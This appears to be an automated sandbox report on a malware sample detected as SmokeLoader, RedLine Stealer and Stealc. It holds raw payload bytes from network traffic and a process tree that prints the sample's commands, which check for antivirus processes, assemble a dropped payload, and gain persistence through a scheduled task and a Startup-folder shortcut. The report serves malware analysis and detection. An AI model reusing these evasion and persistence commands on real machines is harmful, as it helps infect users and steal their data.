2024-09-01 16:27:58 UTC	1369	IN	Data Raw: e8 56 ff ff ff 84 c0 75 04 33 c0 89 06 5a 5d 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b d8 8b fb 8b 32 8b 43 08 3b f0 72 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c 24 04 2b f0 89 73 0c 8b d4 8b c3 e8 d0 fe ff ff 84 c0 75 04 33 c0 eb 0c b0 01 eb 08 8b 1b 3b fb 75 81 33 c0 59 5a 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 ec 85 45 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00 6a 00 8b 03 50 e8 d9 Data Ascii: Vu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u){*J${{+\|$+su3;u3YZ]_^[SVW}sjh Vj;t#EluhjP
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 26 fc ff ff 8b 44 24 0c 89 44 24 04 8b 44 24 10 89 44 24 08 83 7c 24 04 00 74 14 8d 54 24 04 b8 fc 85 45 00 e8 91 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 e2 1a 40 00 64 ff 32 64 89 22 68 cc 85 45 00 e8 39 f9 ff ff 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 2e f9 ff ff b8 ec 85 45 00 e8 8c f9 ff ff b8 fc 85 45 00 e8 82 f9 ff ff b8 28 86 45 00 e8 78 f9 ff ff 68 f8 0f 00 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 af f8 ff ff c3 e9 71 1d 00 00 eb e5 a0 c4 85 45 00 5d c3 55 8b ec 53 80 Data Ascii: &D$D$D$D$\|$tT$E3_^[U3Uh@d2d"hE9=MEthE.EE(Exhj$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 04 e8 44 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 57 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5b c3 90 53 56 83 c4 f8 8b f2 8b d8 8b cc 8d 56 04 8b c3 e8 a3 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 26 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5e 5b c3 8d 40 00 33 d2 85 c0 79 03 83 c0 03 c1 f8 02 3d 00 04 00 00 7f 16 8b 15 24 86 45 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 53 56 57 55 8b f0 bf 18 86 45 00 bd 1c 86 45 00 8b 1d 10 86 45 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 73 Data Ascii: Gt$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;sC;~{s
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 05 1c 86 45 00 83 3d 1c 86 45 00 0c 0f 8d 4c 01 00 00 8b 04 24 01 05 20 86 45 00 8b 04 24 29 05 1c 86 45 00 8b f7 e9 33 01 00 00 8b d8 f6 03 02 75 0d 8b c3 8b 50 08 01 14 24 e8 e9 f6 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 91 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 20 86 45 00 75 67 a1 1c 86 45 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 1c 86 45 00 8b 44 24 04 01 05 20 86 45 00 83 3d 1c 86 45 00 0c 7d 18 a1 1c 86 45 00 01 05 20 86 45 00 03 35 1c 86 45 00 33 c0 a3 1c 86 45 00 8b c6 2b c7 01 05 b8 85 45 00 8b 45 00 25 03 00 00 80 0b f0 89 75 00 b0 01 e9 a2 00 00 00 e8 3e f9 ff ff 8b dd 03 df f6 03 02 75 4d 8b d3 8b c2 8b 48 08 89 0c 24 8b 0c 24 3b 4c 24 04 7d 0e 03 14 24 8b da 8b 04 24 29 Data Ascii: E=EL$ E$)E3uP$<$\|$+D$; EugE;D$\|SD$)ED$ E=E}E E5E3E+EE%u>uMH$$;L$}$$)
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 6f fe ff ff eb 12 81 fb 50 80 45 00 74 0a b8 67 00 00 00 e8 5b fe ff ff 8b c6 5e 5b c3 8b c0 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 af fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a Data Ascii: oPEtg[^[S:vB@[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0Nt
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 8b c0 53 33 db 6a 00 e8 ee ff ff ff 83 f8 07 75 1c 6a 01 e8 e2 ff ff ff 25 00 ff 00 00 3d 00 0d 00 00 74 07 3d 00 04 00 00 75 02 b3 01 8b c3 5b c3 90 55 8b ec 83 c4 f4 0f b7 05 20 60 45 00 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 24 30 40 00 68 02 00 00 80 e8 31 e3 ff ff 85 c0 75 4d 33 c0 55 68 fd 2f 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 40 30 40 00 8b 45 fc 50 e8 06 e3 ff ff 33 c0 5a 59 59 64 89 10 68 04 30 40 00 8b 45 fc 50 e8 e0 e2 ff ff c3 e9 56 08 00 00 eb ef 66 a1 20 60 45 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 60 45 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 00 00 00 00 db e3 9b d9 2d 20 60 45 00 Data Ascii: S3juj%=t=u[U `EEEPjjh$0@h1uM3Uh/@d0d EEPEPjjh@0@EP3ZYYdh0@EPVf `Ef%fUf?ff `E]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- `E
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 0e ff 15 14 80 45 00 c3 90 80 3d 28 60 45 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 14 80 45 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 14 80 45 00 83 c4 04 58 c3 8d 40 00 80 3d 28 60 45 00 01 76 09 50 ff 73 04 e9 d6 ff ff ff c3 90 80 3d 28 60 45 00 01 76 07 50 53 e9 c4 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01 c1 c3 8b c0 80 3d 28 60 45 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 45 00 59 59 5a 58 c3 90 80 3d 28 60 45 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 45 00 5a c3 50 52 80 3d 28 60 45 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 80 45 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13 Data Ascii: E=(`EtPPRTjjhEX@TjjhEX@=(`EvPs=(`EvPS@tA9t9uAA=(`EvPRQQTjjhEYYZX=(`EvRTjjhEZPR=(`EvTjjhEZXD$@
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 77 0f 8d 44 24 04 50 e8 24 d8 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 29 f6 ff ff 8b 54 24 08 6a 00 50 68 3a 3a 40 00 52 ff 15 18 80 45 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 80 45 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 80 45 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 ba 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 f4 39 40 00 89 68 08 a3 3c 86 45 00 c3 8d 40 00 31 d2 a1 3c 86 45 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 86 45 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 22 3b 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b Data Ascii: wD$P$tqD$)T$jPh::@RE\$;SCtESEtL$Q$1@1Edd@9@h<E@1<Etd9udt9uUSVW8EGtH_p3Uh";@d2d"~K_

Target ID:	0
Start time:	12:26:51
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\h8jGj6Qe78.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\h8jGj6Qe78.exe"
Imagebase:	0x400000
File size:	413'184 bytes
MD5 hash:	FD192FB05E0CD219B14C5BF345F33CFB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:26:57
Start date:	01/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:27:15
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\ewggbbh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ewggbbh
Imagebase:	0x400000
File size:	413'184 bytes
MD5 hash:	FD192FB05E0CD219B14C5BF345F33CFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:27:46
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\329C.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\329C.exe
Imagebase:	0x400000
File size:	1'812'227 bytes
MD5 hash:	09607648B95315F78A147FCAC628E63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 5%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:27:47
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:27:47
Start date:	01/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:27:47
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x270000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:27:47
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xe20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:27:48
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x270000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:27:48
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xe20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:27:48
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 795933
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:27:48
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "tagsnegotiationthreadadobe" Literature
Imagebase:	0xe20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:27:48
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Church + ..\Activity + ..\Yahoo + ..\Census + ..\Mario + ..\Postcards + ..\Vessel + ..\Vhs + ..\Maps + ..\Convenience + ..\Comment + ..\Shift z
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:27:49
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\795933\Burn.pif
Wow64 process (32bit):	true
Commandline:	Burn.pif z
Imagebase:	0x620000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	12:27:49
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x700000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
Imagebase:	0x560000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:27:50
Start date:	01/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"
Imagebase:	0x7ff70f330000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:27:51
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Imagebase:	0xe20000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:28:00
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\DFA6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\DFA6.exe
Imagebase:	0x400000
File size:	3'639'176 bytes
MD5 hash:	17D51083CCB2B20074B1DC2CAC5BEA36
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001A.00000002.2426601330.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 24%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:28:02
Start date:	01/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"
Imagebase:	0x7ff72cc60000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:28:06
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Imagebase:	0xe20000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:28:07
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:29:11
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe
Imagebase:	0x270000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	12:30:01
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\ewggbbh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ewggbbh
Imagebase:	0x400000
File size:	413'184 bytes
MD5 hash:	FD192FB05E0CD219B14C5BF345F33CFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	48.3%
Total number of Nodes:	120
Total number of Limit Nodes:	3

Executed Functions

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
